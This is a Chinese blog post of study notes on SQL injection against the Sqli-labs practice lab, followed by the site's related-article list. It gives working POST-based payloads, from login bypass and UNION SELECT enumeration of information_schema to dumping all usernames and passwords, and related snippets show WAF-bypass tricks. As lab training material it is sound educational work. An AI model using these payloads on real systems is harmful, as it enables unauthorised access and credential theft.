[理论-学习]Web安全-SQL注入-基础04

最新推荐文章于 2022-06-01 10:24:07 发布
最新推荐文章于 2022-06-01 10:24:07 发布
阅读量147 收藏
点赞数
分类专栏: # SQL注入 文章标签: SQL注入 报错注入 字符型注入 POST方式 数据库安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40929683/article/details/119764730
版权

声明:

由于笔者能力有限,难免出现各种错误和漏洞。全文仅作为个人笔记,仅供参考。

笔记内容来源于各类网课。

环境:

以Sqli-labs中的less11,12为实验环境。

一、实验(POST方式的基于报错的字符型注入-单引号)

1. 使用POST方式传入参数

输入的uname和passwd能影响页面显示。

2. 测试语句能否报错

使uname=1‘,能报错。

可以看出passwod使单引号闭合。但是报错的语句很难看出uname用什么闭合。

使uname=1’“,爆出uname附近SQL语句错误。

可以看出我们的3”后使用的是单引号闭合。可以推测出SQL语句样式。

select columns... from table_name where username='$uname' and password='$passwd'

判断这是一个POST类型的字符型注入(单引号闭合)。

3. 测试语句能否恶意执行(能不报错)

令uname=1’ or 1 #,可以登陆成功,表示我们的语句被执行了

确定了有注入的可能。

4. 判断内部查询返回的字段数

使用order by判断字段数为2。

5. 判断当前页面使用的字段(查询回显点)

得到1,2的回显位置。

6. 获取当前的数据名,用户名

uname=1' union select user(),database() #

得到当前的用户为root,数据库为security。

7. 获取当前数据库的表名

uname=1' union select count(table_name),group_concat(table_name)
 from information_schema.tables where table_schema = database() #

得到当前的表为4个,和4个表名。

8. 获取当前数据库的users表的字段名

uname=1' union 
select count(column_name),group_concat(column_name) 
from information_schema.columns 
where table_schema = database() and table_name = 'users' #

得到当前有3个字段,和对应的字段名。

9. 获取users的所有户名和密码

uname=1' union select count(username),
group_concat(concat_ws(':',username,password,0x3c62723e)) 
from users #

二、实验(POST方式的基于报错的字符型注入-双引号)

1. 使用POST方式传入参数

同实验一,uname和passwd的参数值可以影响页面。

2. 测试语句能否报错

使用uname=1‘,没有报错。 

使用uname=1",报错。为了看到uname附近的语句。

使用id=1”‘。

可以判断出,闭合方式是双引号+一个括号的方式。猜测SQL语句为:

select columns... from table_name where username=("$uname") and password=("$passwd")

是一个POST方式的字符型注入(双引号、括号闭合)。

3. 测试语句能否恶意执行(能不报错)

uname=1") or 1 #

可以判断有注入点存在。

4. 判断内部查询返回的字段数

uname=1")  order by 2 #
uname=1")  order by 3 #

得到字段数为2.

后面的步骤与实验一的方法一样操作即可。

3hex___________
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA——SQL注入
weixin_44817272的博客
06-30 252
一点点的sql知识: SQL语句使用注意事项: SQL 语言大小写不敏感。 SQL 可以写在一行或者多行 关键字不能被缩写也不能分行 各子句一般要分行写。 使用缩进提高语句的可读性。 MySQL数据库5.0版本以后和5.0版本以前有一个大的区别,就是MySQL5.0以后的版本中默认放着一个information_schema数据库,这个数据库存放着该数据库中所有的库名、表名和列名等等。 >>>可以根据information_schema这个数据库来爆出数据库的库名、表名和列名了,而MyS
提交数据里面有and就报错_数据库的一些注入技巧mysql
weixin_39580748的博客
11-30 370
数据库的一些注入技巧-mysql默认数据库MySQL需要root权限information_schema版本5及更高版本可用尝试注入False表示查询无效(mysql语句错误/网页内容为空/与原页面不一致)True表示查询有效(网页内容与原先一致)字符串型漏洞语句:select * from table where id = ‘1’;'False''True"False""True\Fa...
Web安全--Sql注入基础
m0_37786014的博客
03-06 188
以下为视频笔记记录: SQL注入点的判断: 如果+1,-1页面有变化,就考虑联合查询,如果页面没有变化就考虑布尔类型,此时看是否有报错,如果有报错就是报错注入,如果没有报错也没有回显的话就看是否有布尔类型的状态,如果有布尔类型状态就考虑布尔盲注,如果以上都没有则看是否有延时注入 ?id=35 +1/-1 select * from tbName where id=35 ?id=35'...
SQL注入Bypass WAF
PolarPeak的博客
06-01 2815
Best WAF Bypass 1 : order by /**/ORDER/**/BY/**/ /*!order*/+/*!by*/ /*!ORDER BY*/ /*!50000ORDER BY*/ /*!50000ORDER*//**//*!50000BY*/ /*!12345ORDER*/+/*!BY*/ UNION select /*!00000Union*/ /*!00000Select*/ /*!50000%55nIoN*/ /*!5000...
mysql注入大全_MYSQL注入语句大全
weixin_42131705的博客
01-19 202
本文介绍MYSQL盲注的一些语句和方法学习盲注前先了解下 IFORMATION_SCHEMA 库Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。1.得到所有数据库名:|SCHEMATA ->存储数据库名的表|---字段:SCHEMA...
mysql 注入语句_MYSQL注入语句
weixin_33007509的博客
01-18 1163
一、信息查询 information_schema是MySQL 5.0后产生的虚拟数据库,提供访问数据库元数据的方式,即数据的数据。比如数据库所有库名或表名,列类型,访问权限。MYsql 5.X以上版本的注入查询主要基于information_schem1.UNION 注入 (联合查询注入) ≥ MySQL 5 information_schema (信息数据库),其中保存着关于 My...
信息安全TS-web学习资料
07-18
TS-web可能是一个特定的安全研究领域,专注于Web应用的技术安全问题,如SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等。 3. **学习资料**:这个压缩包包含的学习资料可能涵盖了Web安全基础知识、进阶技术...
计算机-mysql-模型驱动的web应用SQL注入安全漏洞渗透测试研究.pdf
07-08
SQL注入漏洞与模型驱动的渗透测试】 在当前互联网环境中,Web应用程序...通过以上研究,我们期望为Web应用程序的安全性提供更强大的保障,同时推动SQL注入渗透测试技术的进一步发展,以应对不断演变的网络安全挑战。
SQL注入天书 sqli-labs
01-11
sqli-labs是一个精心设计的在线实验室,它包含了多个级别的SQL注入练习,从基础到高级,逐步引导学习者掌握不同类型的SQL注入技巧。每个级别都有详细的说明和解题提示,帮助学习者理解漏洞的成因和利用方法,以及...
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
SQL 注入天书.pdf
08-06
总的来说,《SQL注入天书》及配套的sqli-labs提供了全面的SQL注入学习路径,从基础到高级,从理论到实践,有助于安全专业人士和开发人员增强对这一重要安全威胁的理解和应对能力。通过深入学习和实践,可以有效地...
MySql注入科普
huike008的博客
06-01 161
默认存在的数据库: mysql 需要root权限读取 information_schema 在5以上的版本中存在 测试是否存在注入方法 假:表示查询是错误的 (MySQL 报错/返回页面与原来不同) 真:表示查询是正常的 (返回页面与原来相同) 共三种情况: 字符串类型查询时: 数字类型查询时: 登陆时: ‘ 假 ” 真 “ 假 “” 真...
Mysql注入总结(一)
weixin_33798152的博客
08-07 262
先来看看瞌睡龙的科普文章默认存在的数据库:mysql需要root权限读取information_schema在5以上的版本中存在测试是否存在注入方法假:表示查询是错误的 (MySQL 报错/返回页面与原来不同)真:表示查询是正常的 (返回页面与原来相同)共三种情况:字符串类型查询时:数字类型查询时:登陆时:'假''真"假""真\假\\真AND 1真AND 0假AND true...
SQL注入总结
Lethe's Blog
07-16 1375
一直想刷一下SQL-Labs,最近终于开始行动。刷题之前,先总结一下Mysql注入过程中常用的一些知识点吧! 一、基本知识 1、常用函数 (1)查看当前数据库版本 version() @@version @@global.version (2)查看当前登陆用户 user() current_user() system_user() session_user() (3)当前使用的数据库 ...
mysql 注入 引号_Mysql注入总结(一)
weixin_30995363的博客
01-18 268
先来看看瞌睡龙的科普文章默认存在的数据库:mysql需要root权限读取information_schema在5以上的版本中存在测试是否存在注入方法假:表示查询是错误的 (MySQL 报错/返回页面与原来不同)真:表示查询是正常的 (返回页面与原来相同)共三种情况:字符串类型查询时:数字类型查询时:登陆时:'假''真"假""真\假\\真AND 1真AND 0假AND true真AND false假...
【靶机渗透】HACKME: 1
安全狐
07-19 906
【靶机渗透】HACKME: 1 本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME: 1 0x01靶机介绍 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布日期 2019年7月18日 作者 x4bx54 难度 初学者,简单 2. 描述 'hackme' is a beginner difficulty level box. The goal is to gain limite
web渗透——SQL注入漏洞攻击步骤
dongxie_tk的博客
10-19 8758
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以市面的防火墙都不会对SQL注入发出警报,如果管理员没查看ⅡS日志的习惯,可能被入侵很长时间都不会发觉。但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况,需要构造巧妙的SQL语句,从而成功获取想要的数据。
mysql注入
我多么希望明天有太阳,来灼烧我腐烂的梦想
12-28 619
本文介绍MYSQL盲注的一些语句和方法 学习盲注前先了解下 IFORMATION_SCHEMA 库 Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有 存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。 1.得到所有数据库名: |SCHEMATA ->存储数据库名的表 |---
SQL注入--MySql
pygain的博客
10-04 931
通过联合查询注入的注入方法,查询information_schema(信息数据库),保存着关于Mysql服务器维护的所有其他的数据库的信息
Web安全初探:SQL注入与漏洞分析
"Web安全入门PPT课件涵盖了Web安全基础知识,包括Web的B/S架构,Web程序的执行过程,以及重点讲解了Web漏洞中的SQL注入问题。" Web安全是一个重要的领域,对于任何涉及Web应用程序开发、维护或管理的人来说都是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值